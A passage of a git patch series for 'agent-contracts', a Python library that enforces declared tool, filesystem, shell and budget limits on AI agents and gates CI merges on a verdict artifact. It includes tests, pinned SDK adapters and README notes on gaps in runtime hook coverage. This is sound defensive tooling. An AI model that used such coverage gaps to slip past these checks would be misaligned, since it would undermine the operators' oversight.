"pass", exit_code=0) + enforcer.record_check("ruff", "pass", exit_code=0) + verdict = enforcer.finalize_run(output={"status": "done"}) + assert verdict.outcome == "pass" + verdict_path = Path(verdict.artifacts["verdict_path"]) + assert verdict_path.exists() + payload = json.loads(verdict_path.read_text(encoding="utf-8")) + assert payload["final_gate"] == "allowed" + assert payload["budgets"]["shell_commands"] == 0 def test_cost_budget(self, enforcer_tier1) -> None: enforcer_tier1.add_cost(0.30) enforcer_tier1.add_cost(0.15) with pytest.raises(ContractViolation, match="cost_usd"): - enforcer_tier1.add_cost(0.10) # Total 0.55 > 0.50 limit + enforcer_tier1.add_cost(0.10) def test_token_budget(self, tmp_yaml, tier1_data) -> None: tier1_data["resources"]["budgets"]["max_tokens"] = 1000 - path = tmp_yaml(tier1_data) - contract = load_contract(path) - enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) + enforcer = ContractEnforcer(load_contract(tmp_yaml(tier1_data)), violation_destination="callback", violation_callback=lambda e: None) enforcer.add_tokens(800) with pytest.raises(ContractViolation, match="tokens"): enforcer.add_tokens(300) def test_input_validation(self, enforcer_tier1) -> None: - errors = enforcer_tier1.validate_input({"query": "hello"}) - assert errors == [] + assert enforcer_tier1.validate_input({"query": "hello"}) == [] def test_input_validation_failure(self, enforcer_tier1) -> None: - errors = enforcer_tier1.validate_input({"query": 123}) # Should be string - assert len(errors) > 0 + assert enforcer_tier1.validate_input({"query": 123}) def test_output_validation(self, enforcer_tier1) -> None: - errors = enforcer_tier1.validate_output({"result": "answer"}) - assert errors == [] - - def test_postcondition_evaluation(self, enforcer_tier1) -> None: - results = enforcer_tier1.evaluate_postconditions({"status": "ok"}) - assert len(results) == 1 - assert results[0].passed is True + assert 
enforcer_tier1.validate_output({"result": "answer"}) == [] def test_violations_accumulated(self, tmp_yaml, tier1_data) -> None: - path = tmp_yaml(tier1_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier1_data)) events = [] - enforcer = ContractEnforcer( - contract, violation_destination="callback", violation_callback=lambda e: events.append(e) - ) - try: + enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: events.append(e)) + with pytest.raises(ContractViolation): enforcer.check_tool_call("unauthorized_tool") - except ContractViolation: - pass assert len(enforcer.violations) == 1 + assert len(events) == 1 - def test_context_manager(self, tmp_yaml, tier1_data) -> None: - path = tmp_yaml(tier1_data) - contract = load_contract(path) - with ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) as enforcer: - enforcer.check_tool_call("search") + def test_context_manager_finalizes(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + with ContractEnforcer(contract, repo_root=tmp_path) as enforcer: + enforcer.record_check("pytest", "pass", exit_code=0) + enforcer.record_check("ruff", "pass", exit_code=0) + enforcer.finalize_run(output={"status": "done"}) + assert enforcer.artifact_path is not None + assert enforcer.artifact_path.exists() def test_no_effects_allows_all(self, tmp_yaml, tier0_data) -> None: - path = tmp_yaml(tier0_data) - contract = load_contract(path) - enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) - enforcer.check_tool_call("anything") # No effects configured = allow all + enforcer = ContractEnforcer(load_contract(tmp_yaml(tier0_data)), violation_destination="callback", violation_callback=lambda e: None) + enforcer.check_tool_call("anything") class TestEnforceContractDecorator: @@ -102,8 +166,7 @@ def 
test_decorator_basic(self, tmp_yaml, tier0_data) -> None: def my_agent(query: str, _enforcer: Any = None) -> str: return "result" - result = my_agent("hello") - assert result == "result" + assert my_agent("hello") == "result" def test_decorator_postcondition_fail(self, tmp_yaml) -> None: data = { @@ -121,7 +184,5 @@ def test_decorator_postcondition_fail(self, tmp_yaml) -> None: def bad_agent(query: str, _enforcer: Any = None) -> None: return None - from agent_contracts.postconditions import PostconditionError - with pytest.raises(PostconditionError): bad_agent("hello") diff --git a/tests/test_init_from_trace.py b/tests/test_init_from_trace.py index d7a8e0f..66b7dcb 100644 --- a/tests/test_init_from_trace.py +++ b/tests/test_init_from_trace.py @@ -7,71 +7,72 @@ import yaml -from agent_contracts.init_from_trace import ( - generate_contract_from_traces, - generate_contract_yaml, -) +from agent_contracts.init_from_trace import generate_contract_from_traces, generate_contract_yaml class TestGenerateFromTraces: def _write_traces(self, tmp_path: Path, traces: list) -> Path: - p = tmp_path / "traces.jsonl" - p.write_text("\n".join(json.dumps(t) for t in traces), encoding="utf-8") - return p + path = tmp_path / "traces.jsonl" + path.write_text("\n".join(json.dumps(t) for t in traces), encoding="utf-8") + return path def test_extracts_tools(self, tmp_path: Path) -> None: traces = [ {"tool_calls": [{"name": "search"}, {"name": "database.read"}]}, {"tool_calls": [{"name": "search"}, {"name": "api.call"}]}, ] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) tools = result["effects"]["authorized"]["tools"] assert "search" in tools assert "database.read" in tools assert "api.call" in tools + def test_extracts_filesystem_and_shell(self, tmp_path: Path) -> None: + traces = [ + { + "filesystem": {"read": ["src/app.py"], "write": ["tests/test_app.py"]}, + 
"shell_commands": ["python -m pytest tests/test_app.py"], + } + ] + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) + authorized = result["effects"]["authorized"] + assert authorized["filesystem"]["read"] == ["src/**"] + assert authorized["filesystem"]["write"] == ["tests/**"] + assert authorized["shell"]["commands"] == ["python -m pytest tests/test_app.py"] + def test_extracts_budgets(self, tmp_path: Path) -> None: traces = [ - {"usage": {"cost_usd": 0.10, "total_tokens": 1000}, "duration_seconds": 5.0, - "tool_calls": [{"name": "a"}, {"name": "b"}]}, - {"usage": {"cost_usd": 0.20, "total_tokens": 2000}, "duration_seconds": 10.0, - "tool_calls": [{"name": "a"}]}, + {"usage": {"cost_usd": 0.10, "total_tokens": 1000}, "duration_seconds": 5.0, "tool_calls": [{"name": "a"}, {"name": "b"}], "shell_commands": ["pytest"]}, + {"usage": {"cost_usd": 0.20, "total_tokens": 2000}, "duration_seconds": 10.0, "tool_calls": [{"name": "a"}], "shell_commands": ["pytest", "ruff"]}, ] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) budgets = result["resources"]["budgets"] - assert budgets["max_cost_usd"] == 0.24 # 0.20 * 1.2 - assert budgets["max_tokens"] == 2400 # 2000 * 1.2 + assert budgets["max_cost_usd"] == 0.24 + assert budgets["max_tokens"] == 2400 + assert budgets["max_shell_commands"] == 3 def test_extracts_identity(self, tmp_path: Path) -> None: traces = [{"agent": {"name": "my-agent", "version": "2.0.0"}, "tool_calls": []}] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) assert result["identity"]["name"] == "my-agent" assert result["identity"]["version"] == "2.0.0" def test_name_override(self, tmp_path: Path) -> None: traces = [{"agent": {"name": "original", "version": "1.0.0"}, "tool_calls": []}] - 
path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path, agent_name="override") + result = generate_contract_from_traces(self._write_traces(tmp_path, traces), agent_name="override") assert result["identity"]["name"] == "override" def test_always_has_postcondition(self, tmp_path: Path) -> None: - traces = [{"tool_calls": []}] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, [{"tool_calls": []}])) assert len(result["contract"]["postconditions"]) >= 1 def test_yaml_output(self, tmp_path: Path) -> None: traces = [{"tool_calls": [{"name": "search"}], "usage": {"cost_usd": 0.01, "total_tokens": 100}}] - path = self._write_traces(tmp_path, traces) - yaml_str = generate_contract_yaml(path) - parsed = yaml.safe_load(yaml_str) + parsed = yaml.safe_load(generate_contract_yaml(self._write_traces(tmp_path, traces))) assert parsed["agent_contract"] == "0.1.0" + assert parsed["observability"]["run_artifact_path"] == ".agent-contracts/runs/{run_id}/verdict.json" def test_empty_traces(self, tmp_path: Path) -> None: - path = self._write_traces(tmp_path, []) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, [])) assert result["identity"]["name"] == "unnamed-agent" - assert "effects" not in result # No tools observed + assert "effects" in result diff --git a/tests/test_loader.py b/tests/test_loader.py index cce2715..3078524 100644 --- a/tests/test_loader.py +++ b/tests/test_loader.py @@ -40,16 +40,13 @@ def test_non_mapping_yaml(self, tmp_path: Path) -> None: class TestValidateContract: def test_valid_tier0(self, tier0_data: Dict[str, Any]) -> None: - errors = validate_contract(tier0_data) - assert errors == [] + assert validate_contract(tier0_data) == [] def test_valid_tier1(self, tier1_data: Dict[str, Any]) -> None: - errors = validate_contract(tier1_data) - assert errors 
== [] + assert validate_contract(tier1_data) == [] def test_valid_tier2(self, tier2_data: Dict[str, Any]) -> None: - errors = validate_contract(tier2_data) - assert errors == [] + assert validate_contract(tier2_data) == [] def test_missing_identity(self) -> None: data = { @@ -57,7 +54,7 @@ def test_missing_identity(self) -> None: "contract": {"postconditions": [{"name": "x", "check": "true"}]}, } errors = validate_contract(data) - assert any("identity" in e for e in errors) + assert any("identity" in error for error in errors) def test_missing_postconditions(self) -> None: data = { @@ -66,7 +63,7 @@ def test_missing_postconditions(self) -> None: "contract": {"postconditions": []}, } errors = validate_contract(data) - assert any("postconditions" in e for e in errors) + assert any("postconditions" in error for error in errors) def test_invalid_version_format(self) -> None: data = { @@ -75,18 +72,16 @@ def test_invalid_version_format(self) -> None: "contract": {"postconditions": [{"name": "x", "check": "true"}]}, } errors = validate_contract(data) - assert any("agent_contract" in e for e in errors) + assert any("agent_contract" in error for error in errors) def test_x_extension_allowed(self, tier0_data: Dict[str, Any]) -> None: tier0_data["x-custom-field"] = {"hello": "world"} - errors = validate_contract(tier0_data) - assert errors == [] + assert validate_contract(tier0_data) == [] class TestLoadContract: def test_load_tier0(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: - path = tmp_yaml(tier0_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier0_data)) assert contract.tier == 0 assert contract.identity.name == "test-agent" assert contract.identity.version == "1.0.0" @@ -94,17 +89,20 @@ def test_load_tier0(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: assert contract.postconditions[0].name == "has_output" def test_load_tier1(self, tmp_yaml, tier1_data: Dict[str, Any]) -> None: - path = tmp_yaml(tier1_data) - contract = 
load_contract(path) + contract = load_contract(tmp_yaml(tier1_data)) assert contract.tier == 1 assert contract.budgets is not None assert contract.budgets.max_cost_usd == 0.50 + assert contract.budgets.max_shell_commands == 5 assert contract.effects_authorized is not None assert "search" in contract.effects_authorized.tools + assert contract.effects_authorized.filesystem is not None + assert contract.effects_authorized.filesystem.write == ["src/**", "tests/**"] + assert contract.effects_authorized.shell is not None + assert "python -m pytest *" in contract.effects_authorized.shell.commands def test_load_tier2(self, tmp_yaml, tier2_data: Dict[str, Any]) -> None: - path = tmp_yaml(tier2_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier2_data)) assert contract.tier == 2 assert contract.failure_model is not None assert len(contract.failure_model.errors) == 2 @@ -114,6 +112,13 @@ def test_load_tier2(self, tmp_yaml, tier2_data: Dict[str, Any]) -> None: assert contract.slo is not None assert contract.slo.contract_satisfaction_rate is not None assert contract.slo.contract_satisfaction_rate.target == 0.995 + assert contract.observability is not None + assert contract.observability.run_artifact_path == ".agent-contracts/runs/{run_id}/verdict.json" + + def test_source_path_preserved(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: + path = tmp_yaml(tier0_data) + contract = load_contract(path) + assert contract.source_path == str(path.resolve()) def test_strict_validation_raises(self, tmp_yaml) -> None: bad_data = {"agent_contract": "bad", "identity": {"name": "a"}} @@ -127,13 +132,11 @@ def test_non_strict_returns_partial(self, tmp_yaml) -> None: "identity": {"name": "partial", "version": "0.0.1"}, "contract": {"postconditions": [{"name": "x", "check": "true"}]}, } - path = tmp_yaml(partial) - contract = load_contract(path, strict=False) + contract = load_contract(tmp_yaml(partial), strict=False) assert contract.identity.name == "partial" def 
test_raw_preserved(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: tier0_data["x-custom"] = "value" - path = tmp_yaml(tier0_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier0_data)) assert contract.raw is not None assert contract.raw["x-custom"] == "value" diff --git a/tests/test_postconditions.py b/tests/test_postconditions.py index b437be4..df9d875 100644 --- a/tests/test_postconditions.py +++ b/tests/test_postconditions.py @@ -32,10 +32,6 @@ def test_equality(self) -> None: assert evaluate_expression('output.status == "resolved"', ctx) is True assert evaluate_expression('output.status == "failed"', ctx) is False - def test_inequality(self) -> None: - ctx = {"output": {"status": "resolved"}} - assert evaluate_expression('output.status != "failed"', ctx) is True - def test_numeric_comparison(self) -> None: ctx = {"output": {"score": 0.85}} assert evaluate_expression("output.score >= 0.8", ctx) is True @@ -59,9 +55,10 @@ def test_nested_path(self) -> None: ctx = {"output": {"data": {"nested": {"value": 42}}}} assert evaluate_expression("output.data.nested.value == 42", ctx) is True - def test_missing_path_returns_false(self) -> None: - ctx = {"output": {}} - assert evaluate_expression("output.nonexistent is not None", ctx) is False + def test_logical_and_or(self) -> None: + ctx = {"checks": {"pytest": {"exit_code": 0}, "ruff": {"exit_code": 1}}} + assert evaluate_expression("checks.pytest.exit_code == 0 and checks.ruff.exit_code == 1", ctx) is True + assert evaluate_expression("checks.pytest.exit_code == 1 or checks.ruff.exit_code == 1", ctx) is True def test_truthiness_fallback(self) -> None: assert evaluate_expression("output", {"output": "nonempty"}) is True @@ -84,27 +81,24 @@ def test_sync_warn_calls_callback(self) -> None: warnings: list = [] pcs = [PostconditionDef(name="warn_check", check='output == "good"', enforcement="sync_warn")] results = evaluate_postconditions(pcs, "bad", on_warn=lambda pc, o: 
warnings.append(pc.name)) - assert len(warnings) == 1 - assert warnings[0] == "warn_check" + assert warnings == ["warn_check"] assert results[0].passed is False - def test_async_monitor_deferred(self) -> None: - async_items: list = [] - pcs = [PostconditionDef(name="async_check", check="output > 0", enforcement="async_monitor")] - results = evaluate_postconditions(pcs, -1, on_async=lambda pc, o: async_items.append(pc.name)) - assert len(async_items) == 1 - # async_monitor always returns passed=True (deferred evaluation) - assert results[0].passed is True - def test_eval_judge_skipped(self) -> None: pcs = [PostconditionDef(name="judge", check="eval:quality_judge", enforcement="sync_block")] - results = evaluate_postconditions(pcs, "anything") - assert results[0].passed is True # Skipped, not evaluated + assert evaluate_postconditions(pcs, "anything")[0].passed is True - def test_multiple_postconditions(self) -> None: + def test_checks_context(self) -> None: pcs = [ - PostconditionDef(name="not_none", check="output is not None", enforcement="sync_block"), - PostconditionDef(name="has_data", check='output.status == "ok"', enforcement="sync_warn"), + PostconditionDef( + name="repo_checks_green", + check="checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", + enforcement="sync_block", + ) ] - results = evaluate_postconditions(pcs, {"status": "ok"}) - assert all(r.passed for r in results) + results = evaluate_postconditions( + pcs, + {"status": "done"}, + extra_context={"checks": {"pytest": {"exit_code": 0}, "ruff": {"exit_code": 0}}}, + ) + assert results[0].passed is True From a79615a40b14049bd98e2d720cf2c4efae2a1aa3 Mon Sep 17 00:00:00 2001 From: Piyush Vyas Date: Mon, 6 Apr 2026 15:58:03 -0500 Subject: [PATCH 2/4] feat(adapters): framework-agnostic core, real-SDK integration tests, pinned versions The contract, CLI, verdict artifact, and GitHub Action are framework- and provider-agnostic by design. 
The CI verdict gate is the source of truth for enforcement; in-runtime adapters are optional ergonomic helpers that forward host hook calls into the same enforcer. - pin claude-agent-sdk==0.1.56, openai-agents==0.13.5, langchain-core==1.2.26 in their respective extras - gate all three SDK extras on Python 3.10+ (core stays 3.9+) - fix OpenAI adapter import path (from agents import RunHooks) - add real-SDK integration tests using pytest.importorskip so adapters are validated against the actual installed SDK base classes / hook surfaces, not stub fallbacks - wire CI to install [claude,openai,langchain] extras on Python 3.10+ matrix entries so the integration tests run - mypy: skip following imports into framework SDKs (newer-Python syntax) - drop CrewAI and Pydantic AI adapters/extras/tests - README: lead with "CI verdict gate = source of truth", document pinned SDK versions, add v0.3.0 TypeScript adapter roadmap Co-Authored-By: Claude Opus 4.6 (1M context) --- .github/workflows/ci.yml | 6 +- CHANGELOG.md | 14 +- README.md | 22 +++- pyproject.toml | 27 ++-- src/agent_contracts/adapters/__init__.py | 13 +- src/agent_contracts/adapters/crewai.py | 105 --------------- src/agent_contracts/adapters/openai_agents.py | 2 +- src/agent_contracts/adapters/pydantic_ai.py | 121 ------------------ tests/test_adapters/test_claude_agent.py | 23 ++++ tests/test_adapters/test_crewai.py | 76 ----------- tests/test_adapters/test_langchain.py | 15 +++ tests/test_adapters/test_openai_agents.py | 29 +++++ tests/test_adapters/test_pydantic_ai.py | 58 --------- 13 files changed, 124 insertions(+), 387 deletions(-) delete mode 100644 src/agent_contracts/adapters/crewai.py delete mode 100644 src/agent_contracts/adapters/pydantic_ai.py delete mode 100644 tests/test_adapters/test_crewai.py delete mode 100644 tests/test_adapters/test_pydantic_ai.py diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index bc49da6..79fb20d 100644 --- a/.github/workflows/ci.yml +++ 
b/.github/workflows/ci.yml @@ -17,8 +17,12 @@ jobs: - uses: actions/setup-python@v5 with: python-version: ${{ matrix.python-version }} - - name: Install dependencies + - name: Install core (3.9) + if: matrix.python-version == '3.9' run: pip install -e ".[dev]" + - name: Install core + adapter extras (3.10+) + if: matrix.python-version != '3.9' + run: pip install -e ".[dev,claude,openai,langchain]" - name: Lint run: python -m ruff check src/ tests/ - name: Type check diff --git a/CHANGELOG.md b/CHANGELOG.md index 5b314f8..384eb3d 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -2,7 +2,7 @@ All notable changes to this project are tracked here. -## [0.2.0] - 2026-04-02 +## [0.2.0] - 2026-04-06 ### Added @@ -13,8 +13,16 @@ All notable changes to this project are tracked here. - verdict artifact emission and CLI verdict gating - coding-agent trace bootstrap improvements - coding/build-focused demo contracts and CI action semantics +- real-SDK integration tests for Claude, OpenAI, and LangChain adapters (run against the pinned SDK versions in CI) ### Changed -- promoted the coding/build-agent guardrail work into the v0.2.0 release line -- clarified Claude/Codex/OpenAI integration limits around hard stops vs final CI gating +- positioned the contract + CLI + verdict artifact + GitHub Action as the framework-agnostic, provider-agnostic enforcement surface; the CI verdict gate is the source of truth +- pinned framework adapter SDKs to exact versions: `claude-agent-sdk==0.1.56`, `openai-agents==0.13.5`, `langchain-core==1.2.26` +- gated all three adapter extras on Python 3.10+ (core remains 3.9+) +- fixed the OpenAI adapter import path (`from agents import RunHooks`) + +### Removed + +- CrewAI adapter and `[crewai]` extra +- Pydantic AI adapter and `[pydantic-ai]` extra diff --git a/README.md b/README.md index 42069a1..22f55db 100644 --- a/README.md +++ b/README.md @@ -6,6 +6,10 @@ `agent-contracts` lets a repository declare what an agent may read, write, run, call, and 
spend — and then emit one durable verdict artifact showing whether the run passed, warned, blocked, or failed. +The contract, CLI, verdict artifact, and GitHub Action are **framework-agnostic and provider-agnostic by design** — they don't depend on any agent SDK or model provider. Optional adapters for Claude Agent SDK, OpenAI Agents SDK, and LangChain are thin ergonomic helpers that forward in-runtime hook calls into the same enforcer. + +> **The CI verdict gate is the source of truth.** The merge cannot go green if the verdict is `blocked` or `fail`. In-runtime adapters add convenience — the gate is what makes enforcement complete. + ```bash pip install aicontracts ``` @@ -152,19 +156,23 @@ python -m agent_contracts.cli init --template coding python -m agent_contracts.cli check-verdict .agent-contracts/runs/<run-id>/verdict.json ``` -## Host integrations +## Framework adapters (optional) -### Claude Code / Claude SDK +The core (contract, CLI, verdict artifact, GitHub Action) is framework-agnostic and provider-agnostic. Adapters are optional ergonomic helpers that wire in-runtime hook calls into the same enforcer. Each is pinned to a specific SDK version and tested against the real SDK in CI. -Claude is the strongest local hard-stop path in this repo today because it can deny tool use before execution through hooks. Use the repo contract as the source of truth, and map the contract's allowlists into Claude's hook surface where possible. +| Framework | Extra | Pinned SDK | +|---|---|---| +| Claude Agent SDK | `aicontracts[claude]` | `claude-agent-sdk==0.1.56` | +| OpenAI Agents SDK | `aicontracts[openai]` | `openai-agents==0.13.5` | +| LangChain | `aicontracts[langchain]` | `langchain-core==1.2.26` | -### Codex +All three SDK extras require Python 3.10+. The core package supports Python 3.9+. -Codex can use the same repo-local contract for enforcement in wrappers and for final CI gating via verdict artifacts.
The contract file stays in the repo; CI becomes the final source of truth for merge readiness. +In-runtime adapters add hard-stop coverage where the host exposes a pre-execution hook, but enforcement completeness still depends on the host's hook surface. The CI verdict gate is what makes enforcement total: every merge runs the same evaluator against the same contract, regardless of which framework, model, or runtime produced the run. -### OpenAI Agents SDK +### v0.3.0 roadmap -The OpenAI adapter can block tool execution at `on_tool_start`, but cannot recover reasoning tokens already spent deciding to call the tool. The docs and adapter are explicit about that limit. +A companion `@aicontracts/*` TypeScript package with adapters for Vercel AI SDK, Claude TypeScript SDK, and OpenAI Agents JS is planned for v0.3.0. ## GitHub Action diff --git a/pyproject.toml b/pyproject.toml index 38534a5..57ed7c2 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -36,16 +36,12 @@ dependencies = [ [project.optional-dependencies] otel = ["opentelemetry-api>=1.20"] -langchain = ["langchain-core>=0.2"] -crewai = ["crewai>=0.50"] -pydantic-ai = ["pydantic-ai>=0.1"] -openai = ["openai-agents==0.8.4"] -claude = ["claude-agent-sdk==0.1.50; python_version>='3.10'"] +langchain = ["langchain-core==1.2.26; python_version>='3.10'"] +openai = ["openai-agents==0.13.5; python_version>='3.10'"] +claude = ["claude-agent-sdk==0.1.56; python_version>='3.10'"] all = [ "aicontracts[otel]", "aicontracts[langchain]", - "aicontracts[crewai]", - "aicontracts[pydantic-ai]", "aicontracts[openai]", "aicontracts[claude]", ] @@ -103,7 +99,22 @@ module = [ "jsonschema.*", "opentelemetry", "opentelemetry.*", - "openai_agents", +] +ignore_missing_imports = true + +# Framework SDKs may use newer-Python syntax (e.g. match statements) than +# the project's mypy target. Skip following imports into them so the +# adapter modules type-check against forward references only. 
+[[tool.mypy.overrides]] +module = [ + "agents", + "agents.*", + "langchain_core", "langchain_core.*", + "claude_agent_sdk", + "claude_agent_sdk.*", + "mcp", + "mcp.*", ] ignore_missing_imports = true +follow_imports = "skip" diff --git a/src/agent_contracts/adapters/__init__.py b/src/agent_contracts/adapters/__init__.py index cd5e596..c930a39 100644 --- a/src/agent_contracts/adapters/__init__.py +++ b/src/agent_contracts/adapters/__init__.py @@ -1,12 +1,11 @@ """Framework adapters for Agent Contracts. -Each adapter is a thin wrapper (<200 LOC) that maps framework-specific -hooks to the SDK's enforcement API. Install the corresponding extra -to use an adapter: +The contract, CLI, verdict artifact, and GitHub Action are framework- +agnostic by design — these adapters are optional ergonomic helpers that +forward in-runtime hook calls into the same enforcer. The CI verdict +gate is the source of truth. - pip install aicontracts[langchain] - pip install aicontracts[crewai] - pip install aicontracts[pydantic-ai] - pip install aicontracts[openai] pip install aicontracts[claude] # Python 3.10+ + pip install aicontracts[openai] + pip install aicontracts[langchain] """ diff --git a/src/agent_contracts/adapters/crewai.py b/src/agent_contracts/adapters/crewai.py deleted file mode 100644 index b84f5f5..0000000 --- a/src/agent_contracts/adapters/crewai.py +++ /dev/null @@ -1,105 +0,0 @@ -"""CrewAI adapter — contract enforcement for CrewAI agents and crews. 
- -Usage (3 lines): - from agent_contracts.adapters.crewai import ContractGuard - guard = ContractGuard.from_file("contract.yaml") - result = guard.execute(crew, inputs={"query": "..."}) -""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Callable, Dict, List, Optional, Union - -from agent_contracts.enforcer import ContractEnforcer, ContractViolation -from agent_contracts.loader import load_contract -from agent_contracts.types import Contract -from agent_contracts.violations import ViolationEvent - - -class ContractGuard: - """Wraps a CrewAI crew or agent with contract enforcement. - - Provides pre-execution input validation, tool call interception, - and post-execution output validation with postconditions. - """ - - def __init__( - self, - contract: Contract, - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> None: - self._contract = contract - self._enforcer = ContractEnforcer( - contract, - violation_destination=violation_destination, - violation_callback=violation_callback, - ) - - @classmethod - def from_file( - cls, - path: Union[str, Path], - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> "ContractGuard": - """Create a guard from a contract YAML file.""" - contract = load_contract(path) - return cls(contract, violation_destination=violation_destination, - violation_callback=violation_callback) - - @property - def enforcer(self) -> ContractEnforcer: - return self._enforcer - - @property - def violations(self) -> List[ViolationEvent]: - return self._enforcer.violations - - def validate_inputs(self, inputs: Dict[str, Any]) -> List[str]: - """Validate inputs before crew execution.""" - return self._enforcer.validate_input(inputs) - - def check_tool(self, tool_name: str) -> None: - """Check if a tool is authorized by the contract.""" - 
self._enforcer.check_tool_call(tool_name) - - def validate_output(self, output: Any) -> List[str]: - """Validate output after crew execution.""" - errors = self._enforcer.validate_output(output) - self._enforcer.evaluate_postconditions(output) - return errors - - def execute(self, crew: Any, *, inputs: Optional[Dict[str, Any]] = None) -> Any: - """Execute a crew with contract enforcement. - - Validates inputs before execution and outputs/postconditions after. - """ - if inputs is not None: - input_errors = self.validate_inputs(inputs) - if input_errors: - raise ContractViolation(f"Input validation failed: {input_errors}") - - # Execute the crew - result = crew.kickoff(inputs=inputs) - - # Post-execution validation - output = result if not hasattr(result, "raw") else result.raw - self._enforcer.validate_output(output if isinstance(output, dict) else {"result": output}) - self._enforcer.evaluate_postconditions(output) - - return result - - def wrap_tool(self, tool_fn: Callable[..., Any], tool_name: str) -> Callable[..., Any]: - """Wrap a tool function with contract enforcement.""" - - def wrapped(*args: Any, **kwargs: Any) -> Any: - self._enforcer.check_tool_call(tool_name) - return tool_fn(*args, **kwargs) - - wrapped.__name__ = tool_fn.__name__ - wrapped.__doc__ = tool_fn.__doc__ - return wrapped diff --git a/src/agent_contracts/adapters/openai_agents.py b/src/agent_contracts/adapters/openai_agents.py index 3519473..bba28ff 100644 --- a/src/agent_contracts/adapters/openai_agents.py +++ b/src/agent_contracts/adapters/openai_agents.py @@ -23,7 +23,7 @@ from agent_contracts.violations import ViolationEvent try: - from openai_agents import RunHooks + from agents import RunHooks except ImportError: # Stub so the module can be imported without openai-agents class RunHooks: # type: ignore[no-redef] diff --git a/src/agent_contracts/adapters/pydantic_ai.py b/src/agent_contracts/adapters/pydantic_ai.py deleted file mode 100644 index f2e89e4..0000000 --- 
a/src/agent_contracts/adapters/pydantic_ai.py +++ /dev/null @@ -1,121 +0,0 @@ -"""Pydantic AI adapter — contract enforcement for Pydantic AI agents. - -Usage (3 lines): - from agent_contracts.adapters.pydantic_ai import ContractMiddleware - middleware = ContractMiddleware.from_file("contract.yaml") - result = await middleware.run(agent, "user prompt") -""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Callable, List, Optional, Union - -from agent_contracts.enforcer import ContractEnforcer, ContractViolation -from agent_contracts.loader import load_contract -from agent_contracts.types import Contract -from agent_contracts.violations import ViolationEvent - - -class ContractMiddleware: - """Middleware that wraps Pydantic AI agent execution with contract enforcement. - - Intercepts tool calls for effect gating, tracks budgets, - and validates outputs against the contract schema and postconditions. - """ - - def __init__( - self, - contract: Contract, - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> None: - self._contract = contract - self._enforcer = ContractEnforcer( - contract, - violation_destination=violation_destination, - violation_callback=violation_callback, - ) - - @classmethod - def from_file( - cls, - path: Union[str, Path], - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> "ContractMiddleware": - """Create middleware from a contract YAML file.""" - contract = load_contract(path) - return cls(contract, violation_destination=violation_destination, - violation_callback=violation_callback) - - @property - def enforcer(self) -> ContractEnforcer: - return self._enforcer - - @property - def violations(self) -> List[ViolationEvent]: - return self._enforcer.violations - - def check_tool(self, tool_name: str) -> None: - """Check if a tool is authorized by the contract.""" 
- self._enforcer.check_tool_call(tool_name) - - def validate_result(self, result: Any) -> List[str]: - """Validate agent result against contract.""" - output = result - if hasattr(result, "data"): - output = result.data - if hasattr(result, "output"): - output = result.output - - errors = self._enforcer.validate_output( - output if isinstance(output, dict) else {"result": output} - ) - self._enforcer.evaluate_postconditions(output) - return errors - - async def run(self, agent: Any, prompt: str, **kwargs: Any) -> Any: - """Run a Pydantic AI agent with contract enforcement. - - Wraps agent.run() with pre/post validation. - """ - # Validate input - if self._contract.input_schema: - input_data = {"prompt": prompt, **kwargs} - input_errors = self._enforcer.validate_input(input_data) - if input_errors: - raise ContractViolation(f"Input validation failed: {input_errors}") - - # Execute agent - result = await agent.run(prompt, **kwargs) - - # Validate output - self.validate_result(result) - - return result - - def run_sync(self, agent: Any, prompt: str, **kwargs: Any) -> Any: - """Synchronous version of run() for non-async contexts.""" - if self._contract.input_schema: - input_data = {"prompt": prompt, **kwargs} - input_errors = self._enforcer.validate_input(input_data) - if input_errors: - raise ContractViolation(f"Input validation failed: {input_errors}") - - result = agent.run_sync(prompt, **kwargs) - self.validate_result(result) - return result - - def wrap_tool(self, tool_fn: Callable[..., Any], tool_name: str) -> Callable[..., Any]: - """Wrap a tool function with contract enforcement.""" - - def wrapped(*args: Any, **kwargs: Any) -> Any: - self._enforcer.check_tool_call(tool_name) - return tool_fn(*args, **kwargs) - - wrapped.__name__ = tool_fn.__name__ - wrapped.__doc__ = tool_fn.__doc__ - return wrapped diff --git a/tests/test_adapters/test_claude_agent.py b/tests/test_adapters/test_claude_agent.py index 43e5b71..a90110c 100644 --- 
